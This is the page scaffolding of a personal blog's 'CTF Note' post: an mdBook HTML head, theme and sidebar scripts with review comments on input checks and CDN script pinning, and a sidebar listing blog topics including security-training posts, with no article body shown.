dnrops.gitlink.net/posts/ctf/CTF_Note.html


<!DOCTYPE HTML>
<html lang="en" class="coal" dir="ltr">
<head>
<!-- Book generated using mdBook -->
<!-- Document head: page metadata first, then stylesheets, then the one external script. -->
<meta charset="UTF-8">
<title>CTF Note - Andrew&#x27;s Blog</title>
<!-- Custom HTML head -->
<meta name="description" content="Andrew Ryan&#x27;s Blog">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="theme-color" content="#ffffff">
<link rel="icon" href="../../favicon.svg">
<link rel="shortcut icon" href="../../favicon.png">
<!-- Every stylesheet below is a relative path on this site. Keep the order: later sheets override earlier ones. -->
<link rel="stylesheet" href="../../css/variables.css">
<link rel="stylesheet" href="../../css/general.css">
<link rel="stylesheet" href="../../css/chrome.css">
<!-- Fonts -->
<link rel="stylesheet" href="../../FontAwesome/css/font-awesome.css">
<link rel="stylesheet" href="../../fonts/fonts.css">
<!-- Highlight.js Stylesheets -->
<link rel="stylesheet" href="../../highlight.css">
<link rel="stylesheet" href="../../tomorrow-night.css">
<link rel="stylesheet" href="../../ayu-highlight.css">
<!-- Custom theme stylesheets -->
<link rel="stylesheet" href="../../src/style/custom.css">
<!-- MathJax: the only third-party resource in this head. It is fetched from cdnjs on every
     page load with no integrity or crossorigin attribute, so the browser runs whatever that
     URL returns, with full access to this page and its localStorage.
     NOTE(review): pin it with Subresource Integrity
     (integrity="sha384-HASH_PLACEHOLDER" crossorigin="anonymous", hash computed from the
     pinned file) or serve a vendored copy from this site like the other assets.
     MathJax 2.x fetches its config and component files at runtime, which SRI on this one
     tag does not cover. TODO confirm before relying on SRI alone. -->
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
</head>
<body class="sidebar-visible no-js">
<div id="body-container">
<!-- Provide site root to javascript -->
<script>
// Relative path from this page up to the site root.
// NOTE(review): presumably read by scripts loaded later in the page (not visible here); confirm.
var path_to_root = "../../";
// Fallback theme for when nothing usable is stored in localStorage (read by the
// theme-setting script further down). Both branches of the ternary are "coal", so the
// prefers-color-scheme query does not change the result.
var default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? "coal" : "coal";
</script>
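<!-- Work around some values being stored in localStorage wrapped in quotes -->
<script>
  // Values may have been stored wrapped in literal quote characters ('"coal"').
  // Strip one surrounding pair and write the bare value back.
  //
  // Each key gets its own try block and an explicit null check: getItem() returns
  // null for a key that was never set, and in a single shared try block the
  // resulting TypeError on 'mdbook-theme' silently skipped the 'mdbook-sidebar'
  // clean-up as well. The try blocks still cover browsers where touching
  // localStorage itself throws.
  try {
    var theme = localStorage.getItem('mdbook-theme');
    if (theme !== null && theme.startsWith('"') && theme.endsWith('"')) {
      localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
    }
  } catch (e) { }
  try {
    var sidebar = localStorage.getItem('mdbook-sidebar');
    if (sidebar !== null && sidebar.startsWith('"') && sidebar.endsWith('"')) {
      localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
    }
  } catch (e) { }
</script>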
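<!-- Set the theme before any content is loaded, prevents flash -->
<script>
  var theme;
  try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
  // localStorage can be written by any script running on this origin, so the stored
  // value is treated as untrusted input: it is used only when it is a single plain
  // class token. classList.add() throws on an empty string or on whitespace, and an
  // uncaught throw here would stop the script before 'no-js' is swapped for 'js'
  // below. Anything else (including a missing value) falls back to default_theme.
  if (typeof theme !== 'string' || !/^[A-Za-z0-9_-]+$/.test(theme)) { theme = default_theme; }
  var html = document.querySelector('html');
  // 'coal' is the class hard-coded on the html element; replace it with the chosen theme.
  html.classList.remove('coal')
  html.classList.add(theme);
  // Mark the document as script-enabled.
  var body = document.querySelector('body');
  body.classList.remove('no-js')
  body.classList.add('js');
</script>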
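<input type="checkbox" id="sidebar-toggle-anchor" class="hidden">
<!-- Hide / unhide sidebar before it is displayed -->
<script>
  var body = document.querySelector('body');
  var sidebar = null;
  var sidebar_toggle = document.getElementById("sidebar-toggle-anchor");
  if (document.body.clientWidth >= 1080) {
    // Wide viewport: honour the stored preference, defaulting to a visible sidebar.
    try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
    // The stored string ends up inside a class name below, so it is reduced to the
    // two states this script itself uses. Any other stored value (empty, containing
    // whitespace, or unknown) is treated as 'visible' instead of producing an
    // unmatched class or making classList.add() throw after 'sidebar-visible' has
    // already been removed.
    sidebar = sidebar === 'hidden' ? 'hidden' : 'visible';
  } else {
    // Narrow viewport: always start with the sidebar hidden.
    sidebar = 'hidden';
  }
  // Keep the hidden checkbox in sync with the state applied to the body class.
  sidebar_toggle.checked = sidebar === 'visible';
  body.classList.remove('sidebar-visible');
  body.classList.add("sidebar-" + sidebar);
</script>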
<nav id="sidebar" class="sidebar" aria-label="Table of contents">
<div class="sidebar-scrollbox">
<ol class="chapter"><li class="chapter-item affix "><a href="../../index.html">Andrew's Blog</a></li><li class="chapter-item "><a href="../../posts/linux/linux.html"><strong aria-hidden="true">1.</strong> linux</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/linux/install_linux.html"><strong aria-hidden="true">1.1.</strong> install linux</a></li><li class="chapter-item "><a href="../../posts/linux/bash_profile.html"><strong aria-hidden="true">1.2.</strong> bash profile</a></li><li class="chapter-item "><a href="../../posts/linux/command_list.html"><strong aria-hidden="true">1.3.</strong> command list</a></li><li class="chapter-item "><a href="../../posts/linux/git_guide.html"><strong aria-hidden="true">1.4.</strong> git guide</a></li><li class="chapter-item "><a href="../../posts/linux/tar.html"><strong aria-hidden="true">1.5.</strong> tar</a></li><li class="chapter-item "><a href="../../posts/linux/run_x86_elf_in_x64_setup.html"><strong aria-hidden="true">1.6.</strong> run x86 elf in x64 setup</a></li></ol></li><li class="chapter-item "><a href="../../posts/mac/mac.html"><strong aria-hidden="true">2.</strong> mac</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/mac/macos_profiles.html"><strong aria-hidden="true">2.1.</strong> macos profiles</a></li></ol></li><li class="chapter-item "><a href="../../posts/swift/swift.html"><strong aria-hidden="true">3.</strong> swift</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/swift/learn_swift.html"><strong aria-hidden="true">3.1.</strong> learn swift basics</a></li><li class="chapter-item "><a href="../../posts/swift/swift_extensions.html"><strong aria-hidden="true">3.2.</strong> Swift extensions</a></li><li class="chapter-item "><a href="../../posts/swift/swiftui_extension.html"><strong aria-hidden="true">3.3.</strong> SwiftUI 
extensions</a></li><li class="chapter-item "><a href="../../posts/swift/install_swift.html"><strong aria-hidden="true">3.4.</strong> install swift</a></li><li class="chapter-item "><a href="../../posts/swift/task_planner.html"><strong aria-hidden="true">3.5.</strong> implment task panner app with SwiftUI</a></li><li class="chapter-item "><a href="../../posts/swift/swift_cheat_sheet.html"><strong aria-hidden="true">3.6.</strong> Swift Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/swift/yinci_url.html"><strong aria-hidden="true">3.7.</strong> Personal privacy protocol</a></li><li class="chapter-item "><a href="../../posts/swift/swift_regular_exressions.html"><strong aria-hidden="true">3.8.</strong> Swift regular exressions</a></li><li class="chapter-item "><a href="../../posts/ios/how_to_create_beautiful_ios_charts_in_swift.html"><strong aria-hidden="true">3.9.</strong> How to Create Beautiful iOS Charts in鑱絊wift</a></li><li class="chapter-item "><a href="../../posts/swift/swiftui_source_code.html"><strong aria-hidden="true">3.10.</strong> SwiftUI source code</a></li><li class="chapter-item "><a href="../../posts/swift/use_swift_fetch_iciba_api.html"><strong aria-hidden="true">3.11.</strong> use swift fetch iciba API</a></li></ol></li><li class="chapter-item "><a href="../../posts/ios/ios.html"><strong aria-hidden="true">4.</strong> ios</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/ios/cocaposd_setup_and_install_for_ios_project.html"><strong aria-hidden="true">4.1.</strong> cocaposd setup and install for ios project</a></li><li class="chapter-item "><a href="../../posts/ios/swiftui_show_gif_image.html"><strong aria-hidden="true">4.2.</strong> SwiftUI show gif image</a></li><li class="chapter-item "><a href="../../posts/ios/implement_task_planner_app.html"><strong aria-hidden="true">4.3.</strong> implement Task planner App</a></li></ol></li><li class="chapter-item "><a 
href="../../posts/objective_c/objective_c.html"><strong aria-hidden="true">5.</strong> objective_c</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/objective_c/objective_c_cheat_sheet.html"><strong aria-hidden="true">5.1.</strong> Objective-C Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/objective_c/objective_c_for_absolute_beginners_read_note.html"><strong aria-hidden="true">5.2.</strong> Objective-C Note</a></li></ol></li><li class="chapter-item "><a href="../../posts/dart/dart.html"><strong aria-hidden="true">6.</strong> dart</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/dart/flutter.html"><strong aria-hidden="true">6.1.</strong> Flutter Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/dart/dart_cheat_sheet.html"><strong aria-hidden="true">6.2.</strong> Dart Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/flutter/flutter_dev_test.html"><strong aria-hidden="true">6.3.</strong> Flutter dev test</a></li></ol></li><li class="chapter-item "><a href="../../posts/rust/rust.html"><strong aria-hidden="true">7.</strong> rust</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/rust/offline_use_rust.html"><strong aria-hidden="true">7.1.</strong> Offline use rust</a></li><li class="chapter-item "><a href="../../posts/rust/rust_grammer.html"><strong aria-hidden="true">7.2.</strong> rust grammar</a></li><li class="chapter-item "><a href="../../posts/rust/pase_string_and_decimal_conversion.html"><strong aria-hidden="true">7.3.</strong> pase string and decimal conversion</a></li><li class="chapter-item "><a href="../../posts/rust/parse_types.html"><strong aria-hidden="true">7.4.</strong> rust types</a></li><li class="chapter-item "><a href="../../posts/rust/rust_life_cycle.html"><strong aria-hidden="true">7.5.</strong> Rust life 
cycle</a></li><li class="chapter-item "><a href="../../posts/rust/rust_generic.html"><strong aria-hidden="true">7.6.</strong> rust generics</a></li><li class="chapter-item "><a href="../../posts/rust/rust_implment_matrix.html"><strong aria-hidden="true">7.7.</strong> Rust implement matrix</a></li><li class="chapter-item "><a href="../../posts/rust/rust_sort.html"><strong aria-hidden="true">7.8.</strong> Rust implement sort algorithms</a></li><li class="chapter-item "><a href="../../posts/rust/implement_aes_encryption.html"><strong aria-hidden="true">7.9.</strong> Rust implement AEC encryption and decryption</a></li><li class="chapter-item "><a href="../../posts/rust/implement_trie_data_structure.html"><strong aria-hidden="true">7.10.</strong> implement trie data structure</a></li><li class="chapter-item "><a href="../../posts/rust/rust_implement_tree.html"><strong aria-hidden="true">7.11.</strong> implement tree data_structure</a></li><li class="chapter-item "><a href="../../posts/rust/list_dir.html"><strong aria-hidden="true">7.12.</strong> list dir</a></li><li class="chapter-item "><a href="../../posts/rust/fast_way_to_implment_object_trait.html"><strong aria-hidden="true">7.13.</strong> fast way to implment object trait</a></li><li class="chapter-item "><a href="../../posts/rust/compress_rust_binary_size.html"><strong aria-hidden="true">7.14.</strong> compress rust binary size</a></li><li class="chapter-item "><a href="../../posts/rust/implment_file_upload_backend.html"><strong aria-hidden="true">7.15.</strong> impliment file upload</a></li><li class="chapter-item "><a href="../../posts/rust/this_is_add_post_cli_implementation_in_rust.html"><strong aria-hidden="true">7.16.</strong> this is add_post cli implementation in rust</a></li><li class="chapter-item "><a href="../../posts/rust/use_rust_implment_a_copyclipbord_cli.html"><strong aria-hidden="true">7.17.</strong> Use rust implment a copyclipbord CLI</a></li><li class="chapter-item "><a 
href="../../posts/rust/sqlite_database_add_delete_update_show_in_rust.html"><strong aria-hidden="true">7.18.</strong> sqlite database add delete update show in rust</a></li><li class="chapter-item "><a href="../../posts/rust/implementing_tokio_joinhandle_for_wasm.html"><strong aria-hidden="true">7.19.</strong> Implementing tokio JoinHandle for wasm</a></li><li class="chapter-item "><a href="../../posts/rust/rust_implement_a_crate_for_encode_and_decode_brainfuck_and_ook.html"><strong aria-hidden="true">7.20.</strong> rust implement a crate for encode and decode brainfuck and ook</a></li><li class="chapter-item "><a href="../../posts/rust/slint_builtin_elements.html"><strong aria-hidden="true">7.21.</strong> Slint Builtin Elements</a></li><li class="chapter-item "><a href="../../posts/rust/corporate_network_install_rust_on_windows.html"><strong aria-hidden="true">7.22.</strong> Corporate network install Rust on windows</a></li><li class="chapter-item "><a href="../../posts/rust/rust_binary_file_how_to_judge_static_link_or_dynamic_link_in_macos.html"><strong aria-hidden="true">7.23.</strong> rust binary file how to judge static link or dynamic link in Macos</a></li><li class="chapter-item "><a href="../../posts/rust/rust_binary_include_dir_and_get_contents.html"><strong aria-hidden="true">7.24.</strong> rust binary include dir and get contents</a></li><li class="chapter-item "><a href="../../posts/rust/rust_logger_non-block.html"><strong aria-hidden="true">7.25.</strong> rust logger non-block</a></li><li class="chapter-item "><a href="../../posts/rust/rust_connect_sql_server_database.html"><strong aria-hidden="true">7.26.</strong> rust connect sql server database</a></li><li class="chapter-item "><a href="../../posts/rust/rust_websocket_implment.html"><strong aria-hidden="true">7.27.</strong> rust websocket implment</a></li></ol></li><li class="chapter-item "><a href="../../posts/java/java.html"><strong aria-hidden="true">8.</strong> java</a><a 
class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/java/java_grammar.html"><strong aria-hidden="true">8.1.</strong> java grammar and codewar</a></li><li class="chapter-item "><a href="../../posts/java/run_jar.html"><strong aria-hidden="true">8.2.</strong> java run .jar</a></li><li class="chapter-item "><a href="../../posts/java/java_pomxml_add_defaultgoal_to_build.html"><strong aria-hidden="true">8.3.</strong> Java pomxml add defaultGoal to build</a></li><li class="chapter-item "><a href="../../posts/java/java_set_mvn_mirror.html"><strong aria-hidden="true">8.4.</strong> Java set mvn mirror</a></li></ol></li><li class="chapter-item "><a href="../../posts/python/python.html"><strong aria-hidden="true">9.</strong> python</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/python/convert_pesn.html"><strong aria-hidden="true">9.1.</strong> convert pesn</a></li><li class="chapter-item "><a href="../../posts/python/find_remove_dir.html"><strong aria-hidden="true">9.2.</strong> find and remove dir</a></li><li class="chapter-item "><a href="../../posts/python/timing_message.html"><strong aria-hidden="true">9.3.</strong> wechat send message</a></li><li class="chapter-item "><a href="../../posts/python/use_python_openpyxl_package_read_and_edit_excel_files.html"><strong aria-hidden="true">9.4.</strong> Use python openpyxl package read and edit excel files</a></li></ol></li><li class="chapter-item "><a href="../../posts/go/go.html"><strong aria-hidden="true">10.</strong> go</a></li><li class="chapter-item "><a href="../../posts/js/js.html"><strong aria-hidden="true">11.</strong> js</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/js/js_tutorial.html"><strong aria-hidden="true">11.1.</strong> js tutorial</a></li><li class="chapter-item "><a href="../../posts/js/js_tutorial_map.html"><strong 
aria-hidden="true">11.2.</strong> ja map</a></li><li class="chapter-item "><a href="../../posts/js/js_tutorial_math.html"><strong aria-hidden="true">11.3.</strong> js math</a></li><li class="chapter-item "><a href="../../posts/js/js_tutorial_object.html"><strong aria-hidden="true">11.4.</strong> js object</a></li><li class="chapter-item "><a href="../../posts/js/js_tutorial_set.html"><strong aria-hidden="true">11.5.</strong> js set</a></li><li class="chapter-item "><a href="../../posts/js/single_thread_and_asynchronous.html"><strong aria-hidden="true">11.6.</strong> single thread and asynchronous</a></li><li class="chapter-item "><a href="../../posts/js/this.html"><strong aria-hidden="true">11.7.</strong> js this</a></li><li class="chapter-item "><a href="../../posts/js/js_implment_aes.html"><strong aria-hidden="true">11.8.</strong> js implment aes</a></li><li class="chapter-item "><a href="../../posts/js/getting_started_with_ajax.html"><strong aria-hidden="true">11.9.</strong> getting started with ajax</a></li><li class="chapter-item "><a href="../../posts/js/BinarySearchTree.html"><strong aria-hidden="true">11.10.</strong> binary search tree</a></li><li class="chapter-item "><a href="../../posts/js/goole_zx.html"><strong aria-hidden="true">11.11.</strong> goole zx</a></li><li class="chapter-item "><a href="../../posts/js/es6.html"><strong aria-hidden="true">11.12.</strong> es6</a></li></ol></li><li class="chapter-item "><a href="../../posts/ruby/ruby.html"><strong aria-hidden="true">12.</strong> ruby</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/ruby/rails_setup_env.html"><strong aria-hidden="true">12.1.</strong> ruby on rails setup environment</a></li><li class="chapter-item "><a href="../../posts/ruby/learn_ruby.html"><strong aria-hidden="true">12.2.</strong> learn ruby</a></li><li class="chapter-item "><a href="../../posts/ruby/ruby_note.html"><strong aria-hidden="true">12.3.</strong> Ruby 
Note</a></li><li class="chapter-item "><a href="../../posts/ruby/setup_ruby_for_ctf.html"><strong aria-hidden="true">12.4.</strong> Setup ruby for CTF</a></li></ol></li><li class="chapter-item "><a href="../../posts/react/react.html"><strong aria-hidden="true">13.</strong> react</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/react/react_life_cycle.html"><strong aria-hidden="true">13.1.</strong> react life cycle</a></li><li class="chapter-item "><a href="../../posts/react/react_router.html"><strong aria-hidden="true">13.2.</strong> react router</a></li><li class="chapter-item "><a href="../../posts/react/react_this.html"><strong aria-hidden="true">13.3.</strong> react this</a></li><li class="chapter-item "><a href="../../posts/react/react_interviw.html"><strong aria-hidden="true">13.4.</strong> react interview</a></li><li class="chapter-item "><a href="../../posts/react/important_react_interview.html"><strong aria-hidden="true">13.5.</strong> important react interview</a></li><li class="chapter-item "><a href="../../posts/react/react_quick_reference.html"><strong aria-hidden="true">13.6.</strong> react quick reference</a></li><li class="chapter-item "><a href="../../posts/react/redux_quick_reference.html"><strong aria-hidden="true">13.7.</strong> redux quick reference</a></li></ol></li><li class="chapter-item "><a href="../../posts/vue/vue.html"><strong aria-hidden="true">14.</strong> vue</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/vue/vue_ajax.html"><strong aria-hidden="true">14.1.</strong> vue ajax</a></li></ol></li><li class="chapter-item "><a href="../../posts/angular/angular.html"><strong aria-hidden="true">15.</strong> angular</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/angular/controller_communication.html"><strong aria-hidden="true">15.1.</strong> controller 
communication</a></li><li class="chapter-item "><a href="../../posts/angular/creating_custom_directives.html"><strong aria-hidden="true">15.2.</strong> creating custom directives</a></li><li class="chapter-item "><a href="../../posts/angular/directive_notes.html"><strong aria-hidden="true">15.3.</strong> directive notes</a></li><li class="chapter-item "><a href="../../posts/angular/directive_communication.html"><strong aria-hidden="true">15.4.</strong> directive communication</a></li><li class="chapter-item "><a href="../../posts/angular/post_params.html"><strong aria-hidden="true">15.5.</strong> post params</a></li><li class="chapter-item "><a href="../../posts/angular/read_json_angular.html"><strong aria-hidden="true">15.6.</strong> read json angular</a></li><li class="chapter-item "><a href="../../posts/angular/same_route_reload.html"><strong aria-hidden="true">15.7.</strong> same route reload</a></li></ol></li><li class="chapter-item "><a href="../../posts/css/css.html"><strong aria-hidden="true">16.</strong> css</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/css/use_css_media.html"><strong aria-hidden="true">16.1.</strong> use css media</a></li></ol></li><li class="chapter-item "><a href="../../posts/php/php.html"><strong aria-hidden="true">17.</strong> php</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/php/for_php_string_implment_some_extemtion_functions.html"><strong aria-hidden="true">17.1.</strong> for php string implment some extemtion functions</a></li><li class="chapter-item "><a href="../../posts/php/php_cheatsheet.html"><strong aria-hidden="true">17.2.</strong> PHP cheatsheet</a></li></ol></li><li class="chapter-item "><a href="../../posts/leetcode/leetcode.html"><strong aria-hidden="true">18.</strong> leetcode</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a 
href="../../posts/leetcode/rust_leetcode.html"><strong aria-hidden="true">18.1.</strong> rust leetcode</a></li><li class="chapter-item "><a href="../../posts/leetcode/rust_codewar.html"><strong aria-hidden="true">18.2.</strong> rust codewar</a></li><li class="chapter-item "><a href="../../posts/leetcode/swift_codewar.html"><strong aria-hidden="true">18.3.</strong> swift codewar</a></li><li class="chapter-item "><a href="../../posts/leetcode/js_leetcode.html"><strong aria-hidden="true">18.4.</strong> js leetcode</a></li><li class="chapter-item "><a href="../../posts/leetcode/java_leetcode.html"><strong aria-hidden="true">18.5.</strong> java leetcode</a></li><li class="chapter-item "><a href="../../posts/leetcode/rust_huawei.html"><strong aria-hidden="true">18.6.</strong> huawei test</a></li><li class="chapter-item "><a href="../../posts/leetcode/rust_utils.html"><strong aria-hidden="true">18.7.</strong> rust common functions</a></li><li class="chapter-item "><a href="../../posts/leetcode/olympiad_training.html"><strong aria-hidden="true">18.8.</strong> Computer olympiad training</a></li></ol></li><li class="chapter-item expanded "><a href="../../posts/ctf/CTF.html"><strong aria-hidden="true">19.</strong> ctf</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../posts/ctf/CTF_Note.html" class="active"><strong aria-hidden="true">19.1.</strong> CTF Note</a></li><li class="chapter-item "><a href="../../posts/ctf/0.1_Web.html"><strong aria-hidden="true">19.2.</strong> Web</a></li><li class="chapter-item "><a href="../../posts/ctf/4.1_Misc.html"><strong aria-hidden="true">19.3.</strong> Misc</a></li><li class="chapter-item "><a href="../../posts/ctf/3.2_PWN_note.html"><strong aria-hidden="true">19.4.</strong> PWN</a></li><li class="chapter-item "><a href="../../posts/ctf/3.1_Crypto.html"><strong aria-hidden="true">19.5.</strong> Crypto</a></li><li class="chapter-item "><a 
href="../../posts/ctf/3.4_RSA_note.html"><strong aria-hidden="true">19.6.</strong> Rsa attack</a></li><li class="chapter-item "><a href="../../posts/ctf/3.5_Base64.html"><strong aria-hidden="true">19.7.</strong> Base64</a></li><li class="chapter-item "><a href="../../posts/ctf/0.0_SQL Injection Cheatsheet.html"><strong aria-hidden="true">19.8.</strong> SQL Injection Cheatsheet</a></li><li class="chapter-item "><a href="../../posts/ctf/1.1_SQL_injection.html"><strong aria-hidden="true">19.9.</strong> SQL Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.2_SQL_injection_UNION_attacks.html"><strong aria-hidden="true">19.10.</strong> SQL Injection UNION attacks</a></li><li class="chapter-item "><a href="../../posts/ctf/1.3_Blind SQL injection.html"><strong aria-hidden="true">19.11.</strong> Blind SQL Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.4_Code Injection.html"><strong aria-hidden="true">19.12.</strong> Code Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.5_SSRF.html"><strong aria-hidden="true">19.13.</strong> SSRF</a></li><li class="chapter-item "><a href="../../posts/ctf/1.6_OS command injection.html"><strong aria-hidden="true">19.14.</strong> OS command injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.7_Local file inclusion.html"><strong aria-hidden="true">19.15.</strong> Local file inclusion</a></li><li class="chapter-item "><a href="../../posts/ctf/1.8_Remote file inclusion.html"><strong aria-hidden="true">19.16.</strong> Remote file inclusion</a></li><li class="chapter-item "><a href="../../posts/ctf/1.9_CSRFm.html"><strong aria-hidden="true">19.17.</strong> CSRF</a></li><li class="chapter-item "><a href="../../posts/ctf/1.10_NoSQL injection.html"><strong aria-hidden="true">19.18.</strong> NoSQL injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.11_JSON injection.html"><strong aria-hidden="true">19.19.</strong> JSON injection</a></li><li 
class="chapter-item "><a href="../../posts/ctf/1.12_CTF_Web_SQL_Note.html"><strong aria-hidden="true">19.20.</strong> CTF Web SQL Note</a></li><li class="chapter-item "><a href="../../posts/ctf/2.1_XXE.html"><strong aria-hidden="true">19.21.</strong> XXE</a></li><li class="chapter-item "><a href="../../posts/ctf/2.2_XSS.html"><strong aria-hidden="true">19.22.</strong> XSS</a></li><li class="chapter-item "><a href="../../posts/ctf/2.3_Upload File.html"><strong aria-hidden="true">19.23.</strong> Upload File</a></li><li class="chapter-item "><a href="../../posts/ctf/2.4_serialize_unserialize.html"><strong aria-hidden="true">19.24.</strong> serialize unserialize</a></li><li class="chapter-item "><a href="../../posts/ctf/2.5_Race condition.html"><strong aria-hidden="true">19.25.</strong> Race condition</a></li><li class="chapter-item "><a href="../../posts/ctf/3.2_PWN_note.html"><strong aria-hidden="true">19.26.</strong> PWN_note</a></li><li class="chapter-item "><a href="../../posts/ctf/3.3_pwn HCTF2016 brop.html"><strong aria-hidden="true">19.27.</strong> pwn HCTF2016 brop</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_patch_defense_skill.html"><strong aria-hidden="true">19.28.</strong> PWN Patch defense skill</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_stack_overflow.html"><strong aria-hidden="true">19.29.</strong> PWN stack overflow</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_heap_overflow.html"><strong aria-hidden="true">19.30.</strong> PWN heap overflow</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_format_string_vulnerability.html"><strong aria-hidden="true">19.31.</strong> PWN Format String Vulnerability</a></li><li class="chapter-item "><a href="../../posts/ctf/kali_linux_tutorials.html"><strong aria-hidden="true">19.32.</strong> Kali linux tutorials</a></li><li class="chapter-item "><a href="../../posts/ctf/google_dorks_2023_lists.html"><strong aria-hidden="true">19.33.</strong> Google Dorks 
2023 Lists</a></li><li class="chapter-item "><a href="../../posts/ctf/dvwa_writeup.html"><strong aria-hidden="true">19.34.</strong> DVWA WriteUp</a></li><li class="chapter-item "><a href="../../posts/ctf/bwapp_writeup.html"><strong aria-hidden="true">19.35.</strong> bWAPP WriteUp</a></li><li class="chapter-item "><a href="../../posts/ctf/sqlilabs_writeup.html"><strong aria-hidden="true">19.36.</strong> sqlilabs WriteUp</a></li><li class="chapter-item "><a href="../../posts/ctf/ctf_train_at_hangzhou.html"><strong aria-hidden="true">19.37.</strong> ctf train at hangzhou</a></li><li class="chapter-item "><a href="../../posts/ctf/ctf_common_mindmap_list.html"><strong aria-hidden="true">19.38.</strong> ctf common mindmap list</a></li><li class="chapter-item "><a href="../../posts/ctf/error_based_sql_injection.html"><strong aria-hidden="true">19.39.</strong> Error Based SQL Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/urlfinder_tutorial.html"><strong aria-hidden="true">19.40.</strong> URLFinder Tutorial</a></li><li class="chapter-item "><a href="../../posts/ctf/observer_ward_tutorial.html"><strong aria-hidden="true">19.41.</strong> observer_ward Tutorial</a></li><li class="chapter-item "><a href="../../posts/ctf/mysql_udf_.html"><strong aria-hidden="true">19.42.</strong> MySQL UDF 提权</a></li><li class="chapter-item "><a href="../../posts/ctf/nuclei__tutorial.html"><strong aria-hidden="true">19.43.</strong> Nuclei Tutorial</a></li><li class="chapter-item "><a href="../../posts/ctf/2024_ctf_solution_thinking.html"><strong aria-hidden="true">19.44.</strong> 2024 ctf solution thinking</a></li><li class="chapter-item "><a href="../../posts/ctf/man_che_si_te_bian_ma.html"><strong aria-hidden="true">19.45.</strong> 曼彻斯特编码</a></li></ol></li></ol>
</div>
<div id="sidebar-resize-handle" class="sidebar-resize-handle">
<div class="sidebar-resize-indicator"></div>
</div>
</nav>
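<!-- Track and set sidebar scroll position -->
<script>
  var sidebarScrollbox = document.querySelector('#sidebar .sidebar-scrollbox');
  // Remember the sidebar scroll offset when a sidebar link is clicked, so the next
  // page can restore it.
  sidebarScrollbox.addEventListener('click', function(e) {
    if (e.target.tagName === 'A') {
      // Storage access can throw when the browser blocks site data; the localStorage
      // reads earlier on this page are guarded the same way.
      try { sessionStorage.setItem('sidebar-scroll', sidebarScrollbox.scrollTop); } catch (err) { }
    }
  }, { passive: true });
  // Read the saved offset once and clear it. If storage is unavailable the value
  // stays null and the script falls through to the "scroll to active entry" branch
  // instead of aborting.
  var sidebarScrollTop = null;
  try {
    sidebarScrollTop = sessionStorage.getItem('sidebar-scroll');
    sessionStorage.removeItem('sidebar-scroll');
  } catch (err) { }
  if (sidebarScrollTop) {
    // preserve sidebar scroll position when navigating via links within sidebar
    sidebarScrollbox.scrollTop = sidebarScrollTop;
  } else {
    // scroll sidebar to current active section when navigating via "next/previous chapter" buttons
    var activeSection = document.querySelector('#sidebar .active');
    if (activeSection) {
      activeSection.scrollIntoView({ block: 'center' });
    }
  }
</script>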
<div id="page-wrapper" class="page-wrapper">
<div class="page">
<div id="menu-bar-hover-placeholder"></div>
<div id="menu-bar" class="menu-bar sticky">
<div class="left-buttons">
<label id="sidebar-toggle" class="icon-button" for="sidebar-toggle-anchor" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
<i class="fa fa-bars"></i>
</label>
<button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
<i class="fa fa-paint-brush"></i>
</button>
<ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
<li role="none"><button role="menuitem" class="theme" id="light">Light</button></li>
<li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
<li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
<li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
<li role="none"><button role="menuitem" class="theme" id="ayu">Ayu</button></li>
</ul>
<button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
<i class="fa fa-search"></i>
</button>
</div>
